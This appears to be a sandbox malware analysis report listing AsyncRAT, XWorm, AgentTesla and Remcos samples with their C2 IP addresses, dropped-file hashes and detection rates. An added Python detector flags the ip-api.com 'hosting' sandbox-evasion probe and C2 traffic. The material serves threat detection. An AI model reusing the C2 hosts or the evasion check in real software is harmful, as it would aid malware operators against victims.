SPECTRAIP (SpectraIP B.V., NL) | e9d0af516a8d65649c6850b69ff15e65cba280f8d44dbc505882dd16cf922320_dump.exe | malicious | AveMaria, PrivateLoader, UACMe | 45.138.16.219
SPECTRAIP (SpectraIP B.V., NL) | filedoc3720001.exe | malicious | AveMaria, PrivateLoader, UACMe | 45.138.16.219
SPECTRAIP (SpectraIP B.V., NL) | DND3243676432.exe | malicious | Remcos | 45.141.215.89
SPECTRAIP (SpectraIP B.V., NL) | Inventory-List.exe | malicious | Remcos | 45.141.215.89
SPECTRAIP (SpectraIP B.V., NL) | nv6mqExGOo.exe | malicious | AsyncRAT, XWorm | 45.141.27.41
SPECTRAIP (SpectraIP B.V., NL) | y9vR6M5sU6.exe | malicious | AsyncRAT, XWorm | 45.141.26.119
SPECTRAIP (SpectraIP B.V., NL) | 84I4L4SXB5.exe | malicious | AveMaria, UACMe | 45.138.16.138
SPECTRAIP (SpectraIP B.V., NL) | 0Yj49F0I3q.elf | malicious | Unknown | 45.137.207.137
TUT-AS (US) | Roblox Account Manager.exe | malicious | Unknown | 208.95.112.1
TUT-AS (US) | x433.exe | malicious | XWorm | 208.95.112.1
TUT-AS (US) | DriverUpdt.exe | malicious | XWorm | 208.95.112.1
TUT-AS (US) | rinvoice.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-AS (US) | rQuotation.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS (US) | 8f5WsFcnTc.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS (US) | ZkqNrYh5cV.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS (US) | rQoutation.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-AS (US) | v31TgVEtHi.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS (US) | yVtOz1fD5G.exe | malicious | AgentTesla | 208.95.112.1
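The context tables above show one pattern repeated across otherwise unrelated families (XWorm, AgentTesla, PureLog Stealer): a request to ip-api.com with fields=hosting, which tells the malware whether its public address belongs to a hosting provider or data center (a cheap sandbox check), followed by traffic to a C2 address such as 45.141.26.232. The following Python detector is an added example and not part of the Joe Sandbox report. It runs over constructed proxy-style log lines; the key=value line format, the workstation names, the benign entries and the C2 port 4444 are assumptions made for the example, while the two indicators (the C2 IP and the ip-api.com hosting query) come from the report.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the report: the C2 address and the geolocation
# service the sample queries for its "hosting" flag.
C2_IPS = {"45.141.26.232"}
GEOIP_HOSTS = {"ip-api.com"}

# Constructed key=value log format for this example (an assumption, not the
# schema of any real proxy).
LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) proc=(?P<proc>\S+) "
    r"dst=(?P<dst>[\d.]+):(?P<port>\d+)(?: url=(?P<url>\S+))?$"
)


def parse_line(line: str) -> dict | None:
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(event: dict) -> list[str]:
    """Return the indicator tags that apply to one parsed event."""
    tags = []
    if event["dst"] in C2_IPS:
        tags.append("c2-address")
    if event.get("url"):
        parts = urlsplit(event["url"])
        if parts.hostname in GEOIP_HOSTS:
            # ip-api accepts a comma-separated field list, so split each value.
            fields = {f for v in parse_qs(parts.query).get("fields", []) for f in v.split(",")}
            # fields=hosting is the "am I in a data center" probe seen in the
            # samples above; any other ip-api query is a plain lookup.
            tags.append("geoip-hosting-check" if "hosting" in fields else "geoip-lookup")
    return tags


def scan(lines) -> list[tuple[str, str, list[str]]]:
    """Return (timestamp, process, tags) for every line that hits an indicator."""
    hits = []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue  # unparseable line: skip it rather than abort the scan
        tags = classify(event)
        if tags:
            hits.append((event["ts"], event["proc"], tags))
    return hits


# Constructed log lines; hosts, the benign traffic and the C2 port are made up.
SAMPLE_LOG = [
    "2024-07-02T06:52:10Z host=WS01 proc=x.exe dst=208.95.112.1:80 url=http://ip-api.com/line/?fields=hosting",
    "2024-07-02T06:52:11Z host=WS01 proc=x.exe dst=45.141.26.232:4444",
    "2024-07-02T06:53:00Z host=WS02 proc=chrome.exe dst=93.184.216.34:443 url=https://example.com/",
    "2024-07-02T06:54:00Z host=WS03 proc=updater.exe dst=208.95.112.1:80 url=http://ip-api.com/json/",
    "this line is not in the expected format",
]

if __name__ == "__main__":
    for ts, proc, tags in scan(SAMPLE_LOG):
        print(ts, proc, ", ".join(tags))
```

A plain ip-api.com lookup is common in legitimate software, so the example keeps it as a separate, lower-severity tag; the hosting-field probe and the C2 address are the two hits worth alerting on.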
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | java_update.exe | malicious | AsyncRAT, Neshta, XWorm
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | java_update.exe | malicious | AsyncRAT, Neshta, XWorm
C:\Program Files (x86)\AutoIt3\Au3Info.exe | java_update.exe | malicious | AsyncRAT, Neshta, XWorm
C:\Program Files (x86)\AutoIt3\Au3Check.exe | java_update.exe | malicious | AsyncRAT, Neshta, XWorm
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):275560
                                      Entropy (8bit):6.292868175467042
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCoP5KVkD8QC2mCBFv9m7usyT8tKQ9clyPqlO91/iDVSsWUG0bCP0BwOvO9:Puo4VQjVsxyItKQNhigibKCM
                                      MD5:5BFFBD5E0AC5D8C8E8F7257912599415
                                      SHA1:5A9F6AB857410BB9F3108A5A6ACF8A7EBA58361F
                                      SHA-256:A3C4641D4CB4608AF18CD06E4C01339C65C25B9289F0AA01CABE0E5C250A0E15
                                      SHA-512:D576DEE2BF7C66293758F07B2A19B8659BA5A65D2FA9C05BA254008F30B46447871FC66B7DED6AD6796B34FB91406F17536DF6E8E2465723138A31A9C8DA5B36
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 97%
                                      Joe Sandbox View:
• Filename: java_update.exe, Detection: malicious
                                      Reputation:low
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):217704
                                      Entropy (8bit):6.601006983838455
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC7xFVaK4T6fWSlXe0lJQafeyrR0kr/yh5DEU/Pk13TfwqiTP0McBUNnUxW:PuV2K4TSFo5Y683TdiQMcGNUl4N
                                      MD5:633E57697FE20B13A19E565EFB15550B
                                      SHA1:4D789F99FD6D9E3024E2E1A35922E875E5F3F113
                                      SHA-256:55075BDACF914AF03AD6CD417AFFC3A604A73AFD3D06A2256A1835CBF0F39B5E
                                      SHA-512:8C49A2C57A51C209E1B032C554AB2251F3DB6FA8FE0609B9EFE9A60412C9018A90B22F61D9027895432FC3615DB54A25DCD55CF5210BFAD7C73B3CF5906A15DB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Joe Sandbox View:
• Filename: java_update.exe, Detection: malicious
                                      Reputation:low
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):237160
                                      Entropy (8bit):6.436536629191244
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCIyRnuBGwl/1Gc9QnvGqyWQ93kr/yh5DEU/P5kP0zU35iuvQBUeGMLu:Pu7l3wdYtcH9b5Y651zU77Ea
                                      MD5:80D5957764641A059A246ACC3B876FD8
                                      SHA1:379F4A825CF3B9EA2CBF96D0AFAA6F5192BE25A0
                                      SHA-256:B904C8888CD019FAD590E1135E917D944BC16340757BC90DDD3511359766B8BB
                                      SHA-512:4FE0AECD7F5B44FA5AC52165C566EEE57145AAA2AF59FBB449B7629511C3A727F09E3A91082DE7845490329619C90CA4ACAF4094CFD7888A97B7FBE1F70A7EAB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Joe Sandbox View:
• Filename: java_update.exe, Detection: malicious
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1675872
                                      Entropy (8bit):7.454506618256521
                                      Encrypted:false
                                      SSDEEP:24576:PC51xB6B9YNgqe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+l:YK0eqkSR7Xgo4TiRPnLWvJY
                                      MD5:14FA88A275AB539403725314719128FA
                                      SHA1:2008F40C314CAE10B55206801AA1B1610F0A872F
                                      SHA-256:15D3823B1CB8C10E2F0A0882BC273093742E957F0E7DB05B98B8FF020897559D
                                      SHA-512:61CB80AD2D4D2E7AC85AADA0E97C5E9596F9AB26473EBDBB911D139BCD7E5EFA60F67B0D7EDAD98E9BBAD9C3E460082D06EBFBC045F536C786F3E98E53C28E23
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Joe Sandbox View:
• Filename: java_update.exe, Detection: malicious
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1841760
                                      Entropy (8bit):7.347582112627405
                                      Encrypted:false
                                      SSDEEP:24576:tEeK2NocwiN/jc41p3qp11JsqbhOUe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+i:PfYP1JsEDkSR7Xgo4TiRPnLWvJD
                                      MD5:B7EAC627FCC70BC9F0368BA3D63DCCFC
                                      SHA1:553FEDAA430E83E64650D0BEE5062D4DA2CBF07D
                                      SHA-256:1DC472EF534923F12EFCA5AE928CC3E8545D1E468F905E693DF88D241C614A46
                                      SHA-512:1556951F835F60830738084CB17639BAC7F1E9DF6592F0F4D3D66365924C0395164CA76DC8F8D8E1AE0847E316D702D96D2D6152B62B69D29ADE3681566102D7
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):346624
                                      Entropy (8bit):7.902529878602557
                                      Encrypted:false
                                      SSDEEP:6144:PuEpXDXz7yIrozs0WuNd3ojusBdgnNW6r4F53ttuGENGFdVCLEYnPO1D7YYoSyZV:59zGImAjJdcH4j3ttzFdVCLNSfHoSWCG
                                      MD5:49D006F81FC856B0ED3A6744396C6E82
                                      SHA1:9285A78391AA44520B5134F5EA46BD7FC4E01A2E
                                      SHA-256:FE301BD4EE2124BA25B1CE60C9BC9A7604089514C8A5CFE72F6E1AB2A17A8F1D
                                      SHA-512:3EB2D67DD36230C6468D2810E13EE7FCF25D84E5D099612F803C4F2AF309724FCC1896034A124DDFDA35FBB401DBC5D1030D87F4BF4F08FFDCD1682F0BA1A634
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 94%
• Antivirus: Virustotal, Detection: 83%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):165976
                                      Entropy (8bit):6.135299341821214
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCovkvQ4gXIRSG+7IJqC3CJyoDjpBnjkP0XGx2SYg+b/Q+y1s3:PugnGZLknnj1X62SYdb4I
                                      MD5:BA8EA53268BDE311893484210DB5D175
                                      SHA1:CED5F2D8D56A2E35FC12722ADA4B6F89D2D18987
                                      SHA-256:11B0A81DF6BB3DF63262042E1D7ACC55B057B44C9264B60F5F145A98E0FB966D
                                      SHA-512:B8708FB369CAD49A0B1A804C3D0E098CBD1E3B67A37D5249D84F95A29CD07381BEBEE5E81D6AC9E3B4125A784550DBE2292540CD8561321D70B3C5514AEF87C3
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1113176
                                      Entropy (8bit):6.446467711397749
                                      Encrypted:false
                                      SSDEEP:24576:kTC6Rb6qu1PyC+NRLtpScpzbtT7pyOolKL8Sq/jrc5xaNIBg:k+6AqSPyC+NltpScpzbtvpJoMQSq/jrL
                                      MD5:7EED01A3E7667D1DC5E9A8F19C31A4D3
                                      SHA1:ABD806F0580C5B56BE794BFE44650D7641A6D71A
                                      SHA-256:31F7CDBC86FF5CBB03CB43D30F13DC8280997AB285BDACA68BE731BC82C5C1FC
                                      SHA-512:00949C67DA8561B33FD6D7B83FDDAB5B2340604FDA26737F9F24858A29D1DD54984B67EE4F25505477C4E30150EF62192515656EB70F4430E9B82E08358CFBE8
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2414080
                                      Entropy (8bit):6.728757078944773
                                      Encrypted:false
                                      SSDEEP:49152:G1GSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL8:s4OEtwiICvYMpfc
                                      MD5:8CD88B0C755A7E8D9E072BE4DAF2BE25
                                      SHA1:0AE0551EBC89A6B88515B12F2AD4171FFDA9ACC4
                                      SHA-256:6BE9791EF08C87545F7EDD41B70880640C568EA1A5DD2EE76CDE400D6F722552
                                      SHA-512:84041FFA70DB1A3057B423D4F693E165C6B8F927C2FA9AE58323C5B3D887EDE5E4EFEC3E49784C19C410D58EFF77F4F04F69468A7D941AAE68599034654C821E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):113233
                                      Entropy (8bit):6.7789810493984115
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCFCrMGEtajbefY/TU9fE9PEtuGCrK:PuFCrfEt+cYa6YCrK
                                      MD5:0FF71A744E70F7F7E1CE56FC4298E688
                                      SHA1:939DEB068D6BCB5BAB11AF96CF6040F26B5EDB8B
                                      SHA-256:3214538D265FB6BFB3A0620229FCD979A0225C0477F0FE0578FB443AE7EC4FDA
                                      SHA-512:0037311257AFC9CFC0E6C1439AFC8E9B9BC83CF19D7E9FF7D24292A37917F56CC95071ACF4909D4FD869C2FB4D596FBABB9CF97C7591DB079549A401132372DB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):409608
                                      Entropy (8bit):6.460025563791325
                                      Encrypted:false
                                      SSDEEP:6144:PuTvqF1Ged2RYbguEuFuTkdj+zRGa7JkjrXyPyMMWvpBVOaqahUqjAGT:TbgvuFuQdj+zRTJkX8yMhB3jhBAi
                                      MD5:83769C80EE264331DD46FBBBDB682CC9
                                      SHA1:F3921FFA18C7B93A262A79C1C7A1A60A88D0CBC1
                                      SHA-256:4D81853DFC97E32B2F03E4C1F75F41C91FD3DF73FB80B23A59484E2EEB9C264F
                                      SHA-512:BADED7629C0D0C40AA785AE0FFCD8D0D7037B050199B517F5BC230C6954FE7ED52E911414CB829A509966AB82CC2CD5DD8868449D2EC9E567141E9A3138C3AF4
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
• Antivirus: Virustotal, Detection: 89%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):214512
                                      Entropy (8bit):6.488889881948425
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCDGnUI/9FXK4+PoSZSb5qURwubvvnzdl1CkTlxAenDl3SoxceC76JNKjzc:PuDGUcsvZZvUmubv7hTHA8l3yROJyDI5
                                      MD5:F085722D23BDED9EB6D55AE1232725CC
                                      SHA1:19C09DFC582FE436B06B536DAC110E26F596FCC2
                                      SHA-256:60EAEFFA9F5182AAFAD9D945DC601590A92782AA102AEF9AE10E19088E7C6179
                                      SHA-512:5BDDCC02CB2D9B0B7270D3D1F1387F94A14047CCAC7810CEEBDE8357A7B2C4D5F79BDA3902CDA2BB5E25558D0D0FA44AFF3DD5846D45AD380FC58CAB364DDDD1
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
• Antivirus: Virustotal, Detection: 90%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):568400
                                      Entropy (8bit):6.67219335276453
                                      Encrypted:false
                                      SSDEEP:12288:lyvTCXdXikLj2jR7trg6Qi3vYsKTU00vq:lyyLj8trn3wsq0vq
                                      MD5:B41B153CA4DFE9D557899142C6FDD767
                                      SHA1:D7310F560839E21A7968DA46E27231290B25A312
                                      SHA-256:FC1577451D4743DBE1B27A1828EA536522CF5C9CBE952A48F58345F53A85D72A
                                      SHA-512:8CE84911CA279CCB86E8D4398CEC16B00E9E29FDF25F766FC0792E71154B2A8FBC22CC8F69387A6F5EC5992AC264556A39C1B9AD940F2AA674538DC4F50502D6
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
• Antivirus: Virustotal, Detection: 90%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1252432
                                      Entropy (8bit):6.763252873451025
                                      Encrypted:false
                                      SSDEEP:24576:d0n7Ubxk/uRvJqLGJLQ4a56duA/85RkV4l7/ZeoMOp:m4iwwGJra0uAUfkVy7/ZX
                                      MD5:9F7E59075683E964E4D6DF66A92AAF0B
                                      SHA1:60EE788C42034ECE4FDB47C325E4EC2BC9DF67AA
                                      SHA-256:D5759CFE49A74CAA1A6A7FA8DB17DE9D570F1BE8DA9FE75AB48E67076ECFF8E1
                                      SHA-512:077D5D9FE8102144D458283ED099DC5C2F51F90B0ECE7DABB0BDA66E9B97F6D12A83527067877A802C0AD46DA974C494DD5EF954AC494D0838DAC87ACF06BADD
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):790096
                                      Entropy (8bit):6.745221507787877
                                      Encrypted:false
                                      SSDEEP:12288:bMvcR0D0B6PyxoxIlZwM+R6R4uFjs1Z7FMN0TzJqccvbXkN58AuimIh:/R0gB6axoCfyR6RLQRF/TzJqe58BimIh
                                      MD5:ECF5236F6653F2D0F55FB26B2ABE3D4F
                                      SHA1:60AC40919543275E088CE78F063DBA998964DFF7
                                      SHA-256:273F4F789C6DAB5593C5273845020DC3E172C98833E38729C9DA159C53AE5623
                                      SHA-512:06F844A46C9AE9B4588C167F809A1023DC88CE7853C61D1DE92841ADC7128C91CB0EC5B5F32E7E6E86C5B81D3161915767F98CF090AF19F6BE680FC1347255DC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Virustotal, Detection: 93%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):562776
                                      Entropy (8bit):6.433164069541556
                                      Encrypted:false
                                      SSDEEP:6144:PuJ0dzerObMhDGJ9UM3sunrXj9BMHmD1tYFLqY/W5R02qO7VKCy7KCzDSEBPj:BeqbWqB3sunrT9+aYFLq3ny7JSEBPj
                                      MD5:8DA8BD2BDE4B0EEAA83DD9B17289F169
                                      SHA1:284502E7ABD3A84AF988CC6D2F4EA87D08D027B6
                                      SHA-256:794C922912321E663916EBF1B11646CE10DBC0842E0FF68571770672FCFAB214
                                      SHA-512:63EEE0EEFC46141F7B94DA48F420326630C9182E4C9CEB44104CE7302832A7219D361F2F61D52CD83B9E1E81CAC1ED86C8C44C8CE805299ABA74A7FA81D235D9
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):127512
                                      Entropy (8bit):6.330981765539028
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCsPo10JOSdnvEhEyr1hg9uCRFRzsxeZ:Pusg1MOc81hmRFJs0Z
                                      MD5:A70C749F32B95B9C01A9919E8F96205D
                                      SHA1:7A43A28D2FCDBF663B4D61E969CD6160F1A444AC
                                      SHA-256:39C83EC2727FFCC589106D1AD4C7BE154C7752382C958252FF510A61F65E24C2
                                      SHA-512:1341ADCD4FEDA85A9425348310A2FA86A1D9AFA705ABFF7FCA2C39FDDFA9C3176239BB87553216743DCBB662211DB0E3C90B644A3CC8DEBE80CD38BBE7ACBAE7
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
• Antivirus: Virustotal, Detection: 89%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):299136
                                      Entropy (8bit):6.7881128883409
                                      Encrypted:false
                                      SSDEEP:6144:PuGXLYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:xXEbH0j4x7R6SvyCMqn
                                      MD5:BB745A9E59BFDC3FED3D6ACC5EB1969E
                                      SHA1:B569EF5567BF533C49F4C59441D1881726DEA540
                                      SHA-256:5C257F423AFD510D6EE9EAB80273CC673995F966932466C9AD74EB2AA613A892
                                      SHA-512:B43198FC36F9DECB3767E6888B632093550394DF5D5826540A0BBDAE711931F595B398CE59C5F4676C1FDA7953C0702D57CC98D3E18309DEA517C536AB63CCCD
                                      Malicious:true
                                      Antivirus:
